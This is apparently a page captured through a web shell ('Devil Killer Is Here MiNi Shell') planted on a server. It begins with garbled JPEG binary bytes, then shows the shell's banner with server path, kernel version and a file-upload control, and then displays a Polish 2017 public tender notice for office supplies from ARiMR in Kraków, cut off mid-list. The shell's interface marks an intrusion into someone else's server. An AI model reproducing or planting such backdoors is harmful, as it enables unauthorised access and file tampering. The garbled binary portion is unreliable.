JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170515/506622-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 506622-N-2017 z dnia 2017-05-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia">0%</span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1061308300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Lubicz</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">25</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">31503 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">126 298 010</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">makiela.wojciech@doplaty.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">124 211 311</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.arimr.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Agencja wykonawcza</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.arimr.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy złożyć w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BOR06.2610.03.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa do siedzib Biur Powiatowych ARiMR w województwie małopolskim materiałów biurowych oraz papieru w poniżej przedstawionych ilościach i asortymencie:CPV: 30192221-5, 30197300-9, 30192100-2, 30141200-1, 24910000-6, 30237430-2, 30192130-1, 30234300-1, 30199500-3, 30197200-8, 30192133-2, 39292500-0, 22600000-6, 30124400-8, 30197130-6, 30192800-9, 44617100-9, 30199230-1, 22000000-0Lp.	Nazwa przedmiotu	Opis	J.m.	Ilość1	Brulion-zeszyt A4/96 twarda oprawa	o pojemności minimum 96 kart, w kratę, z wysokiej jakości papieru, w twardej okładce	Szt.	602	Brulion-zeszyt A5/96 twarda oprawa	o pojemności minimum 96 kart, w kratę, z wysokiej jakości papieru, w twardej okładce	Szt.	803	Cienkopis czerwony	Uniwersalny cienkopis do pisania, podkreślania, kreślenia i kolorowania. Mocna, oprawiona w metal końcówka jest odporna na złamania i rozwarstwienia. Grubość linii - 0,4 mm. Kolor czerwony. Szt.	3504	Cienkopisy 6 szt w komplecie.	Uniwersalne cienkopisy do pisania, podkreślania, kreślenia i kolorowania. Mocna, oprawiona w metal końcówka jest odporna na złamania i rozwarstwienia. Grubość linii - 0,4 mm. Plastikowe etui z zawieszką zawierające 6 szt w kolorach czarny, zielony, granatowy, fioletowy, lila, czerwony. op.	1005	Datownik samotuszujący	Gwarancja dużej wytrzymałości przeznaczony do bardzo intensywnego użytkowania w wersji rok- miesiąc-dzień, o wymiarach nie większych niż 45x25x90mm, wysokość czcionki 3-4 mm	Szt.	1506	Deska z klipem	Deska z folii PCV, środek usztywniony tekturą, mocny sprężysty mechanizm zaciskowy, pojemność do 100 kartek, kolor, format A4	Szt.	757	Deska z klipem zamykana	Deska A4 z klipem zamykana, obydwie okładki z folii PCV, usztywnione tekturą, mocny sprężysty mechanizm zaciskowy, pojemność do 100 kartek, kolor Sz.	908	Wkład do pióra żelowego niebieski	Wkład żelowy do piór automatycznych, długość linii pisania minimum 1200m, grubość linii ok. 0,30-0,32 mm, kolor niebieski, pasujący do długopisu z poz. 13	Szt.	1009	Długopis na sprężynce niebieski	Długopis na sprężynce i przyklejaną podstawą, jednorazowy, kolor tuszu niebieski	Szt.	30010	Długopis jednorazowy czarny Długopis jednorazowy z tuszem w kolorze czarnym, Zakończenie i wentylowana skuwka w kolorze tuszu. Obudowa polistyrenowa, sześciokątna. Końcówka pisząca z węglika wolframu o średnicy 0,7 mm, grubość linii pisania 0,3mm. Ilość atramentu min. 0,4 g, długość linii pisania minimum 3500 m. Atrament na bazie oleju: trwały, wodoodporny, szybkoschnący (<2 s), gwarantujący płynność pisania.	Szt.	100011	Długopis jednorazowy czerwony Długopis jednorazowy z tuszem w kolorze czerwonym, Zakończenie i wentylowana skuwka w kolorze tuszu. Obudowa polistyrenowa, sześciokątna. Końcówka pisząca z węglika wolframu o średnicy 0,7 mm, grubość linii pisania 0,3mm. Ilość atramentu min. 0,4 g, długość linii pisania minimum 3500 m. Atrament na bazie oleju: trwały, wodoodporny, szybkoschnący (<2 s), gwarantujący płynność pisania.	Szt.	80012	Długopis jednorazowy niebieski Długopis jednorazowy z tuszem w kolorze niebieskim, Zakończenie i wentylowana skuwka w kolorze tuszu. Obudowa polistyrenowa, sześciokątna. Końcówka pisząca z węglika wolframu o średnicy 0,7 mm, grubość linii pisania 0,3mm. Ilość atramentu min. 0,4 g, długość linii pisania minimum 3500 m. Atrament na bazie oleju: trwały, wodoodporny, szybkoschnący (<2 s), gwarantujący płynność pisania.	Szt.	120013	Długopis żelowy niebieski	Długopis żelowy. Na wkłady wymienne z igłową końcówką piszącą umożliwiającą rysowanie i kreślenie przy linijce i szablonie. Przeźroczysta obudowa. Ergonomiczny uchwyt. Nasadka zaopatrzona w silikonową kulkę zabezpieczającą przed wysychaniem. Grubość linii pisania 0,27 mm do 0,33 mm w zależności od siły nacisku. Długość linii pisania min. 600-800 m.	Szt.	100014	Długopis żelowy niebieski automat Długopis z wymiennym wkładem żelowym w kolorze niebieskim i gumowym uchwytem. Grubość linii pisania 0,32 mm, długość linii pisania min. 1200 m. Wyposażony w mechanizm chowania wkładu oraz zabezpieczenie przed poplamieniem ubrania. Z przezroczystą obudową pozwalającą kontrolować poziom tuszu. Szt.	100015	Długopis żelowy czerwony automat Długopis z wymiennym wkładem żelowym w kolorze czerwonym i gumowym uchwytem. Grubość linii pisania 0,32 mm, długość linii pisania min. 1200 m. Wyposażony w mechanizm chowania wkładu oraz zabezpieczenie przed poplamieniem ubrania. Z przezroczystą obudową pozwalającą kontrolować poziom tuszu. Szt.	70016	Dziurkacz biurowy min. 35 kartek Metalowy w metalowej obudowie, blokada dźwigni, wskaźnik środka strony, ogranicznik formatu, dziurkuje minimum 35 arkuszy	Szt.	5017	Etykiety samoprzylepne 105*148 4/A4 (op. minimum 100 ark.)	Opakowanie minimum 100 arkuszy, 4 szt. na arkusz A4. Do zadruku w drukarkach atramentowych, laserowych, kserokopiarkach.	Op.	4018	Etykiety samoprzylepne 105*74 8/A4 (op. minimum 100 ark.)	Opakowanie minimum 100 arkuszy, 8 szt. na arkusz A4. Do zadruku w drukarkach atramentowych, laserowych, kserokopiarkach.	Op.	8019	Folia do laminowania A4 op. min. 100 ark.	Folia do laminowania na gorąco A4 mm 80 mikronów, w opakowaniu minimum 100sztuk.	Op.	1020	Folia do drukarki uniwersalna A4 min. 20 ark.	Uniwersalna folia przeźroczysta do wszystkich modeli drukarek atramentowych, monochromatycznych, kolorowych drukarek laserowych i kserokopiarek, grubość 0,1mm, minimum 20 arkuszy w opakowaniu	Op.	2021	Foliopis 1 mm czerwony	odporny na działanie promieni słonecznych, wody i mechaniczne ścieranie, Dostosowany do wielu powierzchni: normalnego papieru, folii oraz kalki kreślarskiej, ma nie ulega dyspersji (rozproszeniu)oraz nie przesiąkać przez papier, kolor czerwony, grubość linii 1 mm	Szt.	5022	Foliopis 1 mm czarny	odporny na działanie promieni słonecznych, wody i mechaniczne ścieranie, Dostosowany do wielu powierzchni: normalnego papieru, folii oraz kalki kreślarskiej, ma nie ulega dyspersji (rozproszeniu)oraz nie przesiąkać przez papier, kolor czarny, grubość linii 1 mm	Szt.	8023	Holder bez taśmy	przezroczyste tworzywo typu plexi zapewnia trwałość identyfikatora, zastosowanie: wygodna kieszonka na karty plastikowe, magnetyczne, lub kontroli dostępu, wymiary hoderu: wewnętrzna 90 x 56 mm, zewnętrzna 92 x 59 mm	Szt.	50024	Klej biurowy w sztyfcie minimum 22g	Klej w sztyfcie do klejenia m.in. papieru, kartonu, nie zawiera rozpuszczalników, nie deformuje klejonej warstwy, usuwalny za pomocą wody, waga minimum 22 g	Szt.	150025	Koperta C4 HK biała (A4 biała samoklejąca) 250 szt	Koperta samoklejąca z paskiem biała, format 229x324mm, opakowanie minimum 250 szt	Op.	5026	Korektor w płynie	Korektor w płynie w buteleczce, pojemność 20 ml, nakrętka z zamocowanym pędzelkiem ułatwiającym nakładanie warstwy korygującej, płyn korekcyjny szybko zasychający.	Szt.	5027	Koszulka na dokumenty A4 Wykonana z foli propylenowej grubości 45 um, przeznaczona na dokumenty w formacie A4, otwarta od góry, przezroczysta, antyelektrostatyczna, antyrefleksyjna, pasek z multiperforacją. Opakowanie minimum 100 szt.	Op.	200028	Koszulka na dokumenty A4 maxi poszerzana	Wykonana z folii propylenowej, przeznaczona na dokumenty w formacie A4, większy od standardowego rozmiar pozwalający na przechowywanie katalogów, cenników, ofert. Otwarta od góry, przezroczysta, antyelektrostatyczna, antyrefleksyjna, pasek z multiperforacją. Opakowanie minimum 25 szt.	Op.	100029	Linijka 20cm	Wykonana z przezroczystego tworzywa, długość 20 cm	Szt.	20030	Linijka 40cm	Wykonana z przezroczystego tworzywa, długość 40 cm	Szt.	10031	Marker czarny CD/DVD 1 mm	Tusz wodoodporny, nietoksyczny, grubość linii ok. 1 mm, kolor czarny	Szt.	20032	Marker - pisak wodoodporny czarny 2-4mm	Marker pisak czarny olejowy, nietoksyczny tusz, grubość linii 2-4mm	Szt.	10033	Marker - pisak wodoodporny czarny 4-5mm	Marker pisak czarny olejowy, nietoksyczny tusz, grubość linii 4-5mm	Szt.	15034	Notes samoprzylepny 51*38	Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek, gramatura min 70 g/m2	Bl.	180035	Notes samoprzylepny 50*75	Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek, gramatura min 70 g/m2	Bl.	156036	Notes samoprzylepny 75*125 lub (76*127)	Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek, gramatura min 70 g/m2	Bl.	156037	Notes samoprzylepny 76*76	Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek, gramatura min 70 g/m2	Bl.	156038	Nożyczki biurowe	Nożyczki biurowe z ostrzem ze stali nierdzewnej, ergonomicznie wyprofilowana rękojeść z niełamliwego plastiku, długość 18-23 cm	Szt.	8039	Ołówek zwykły drewniany z gumką	Klejony na całej długości grafit odporny na złamania, ołówek z gumką, wkład HB	Szt.	100040	Teczka biała archiw. wiązana A4 Wykonana z grubego kartonu (min 350g/m?) do przechowywania dokumentów w składnicy akt, wyposażona w tasiemki, wewnątrz wyposażona w klapki zabezpieczające przed wypadaniem dokumentów, pojemność do 5 cm bieżących dokumentów. Szt.	4000041	Teczka biała archiw. wiązana A4 Wykonana z grubego kartonu (min 350g/m?) do przechowywania dokumentów w składnicy akt, wyposażona w tasiemki, wewnątrz wyposażona w klapki zabezpieczające przed wypadaniem dokumentów, pojemność 5 cm bieżących dokumentów.	Szt.	250042	Pinezki do tablicy korkowej plastikowe	Pinezki plastikowe - opakowanie min. 20 szt.	Op.	10043	Płyta DVD-R, Typ nośnika DVD-R, wielkość nośnika 4,7GB, prędkość zapisu 16x, długość zapisu [min.] - 120min.	Szt.	10044	Płyta CD-R, op. minimum 50 szt.	Typ nośnika - CD-R, Wielkość nośnika 700 MB, Rodzaj zapisu - Jednokrotny, Długość zapisu [min.] - 80, Maksymalna prędkość nagrywania -52x, minimum 50 szt. w opakowaniu	Op.	5045	Papier pakunkowy szary	Papier pakowy szary 100cm x 130cm, minimum 10 arkuszy w opakowaniu.	Op.	1046	papier ksero format A5 120g/m2 satynowy	do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 120g/m2, białość CIE 146( +/-3)-opakowanie -ryza zawiera 500 arkuszy, ryza	16047	Papier ksero format A4 80g/m2	Papier A4 do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 80g/m2, białość CIE 146( +/-3)-opakowanie -ryza zawiera 500 arkuszy.	ryza	300048	Pojemnik na dokumenty kuweta - półka dymna Wykonany z plastiku, przeźroczysty, wymiary orientacyjne 75x311x264 mm na dokumenty A4 (leżąco)	Szt.	15049	Pudło archiwizacyjne (25*34*18) IRZ wraz z pokrywą (średnie)	Wykonane z twardej tektury falistej, otwierane z góry, z przykrywką, na dokumenty formatu A4 i A5, wymiary zewnętrzne po złożeniu: głębokość 340 mm, szerokość 250 mm, wysokość 180 mm), pokrywa dostosowana do wymiarów pudła.	Szt.	600050	Pudło 